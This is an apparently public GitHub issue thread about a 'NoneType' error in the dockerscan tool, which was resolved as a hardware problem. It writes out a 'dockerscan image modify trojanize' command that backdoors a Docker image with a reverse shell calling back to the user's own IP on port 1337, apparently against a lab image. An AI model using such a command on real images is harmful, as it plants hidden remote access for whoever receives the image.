dockerscan icon indicating copy to clipboard operation
dockerscan copied to clipboard

'NoneType' object has no attribute 'append'

Open kanumuruwe45 opened this issue 3 years ago • 2 comments

Hi Team, I am trying to trojaninze the image after pulling it from the Amazon ECR registry then I save it as vulflask But image URI look like this in Amazon ECR (public.ecr.aws/w5b0z5r9/vulflask) docker pull public.ecr.aws/w5b0z5r9/vulflask && docker save public.ecr.aws/w5b0z5r9/vulflask:latest -o ase-vul_flask I am using the below command for trojanize Command : dockerscan image modify trojanize vulflask -l $(curl -XGET -s http://checkip.amazonaws.com/) -p 1337 -o vulflask-trojanized [ * ] Starting analyzing docker image... [ * ] Selected image: 'vul_flask' [ * ] !! 'NoneType' object has no attribute 'append' Anyone can provide info related to this? Any leads are highly appreciated!

kanumuruwe45 avatar Apr 28 '21 08:04 kanumuruwe45

i am seeing the same error. was this resolved?

ankushgoel27 avatar Nov 11 '22 06:11 ankushgoel27

Yes, it is resolved, it is the issue with my mac hardware. I didn't have this issue in VM or on any other device. Please build the image on a different device. I thought it was me who had this issue Hope this helps

kanumuruwe45 avatar Nov 11 '22 09:11 kanumuruwe45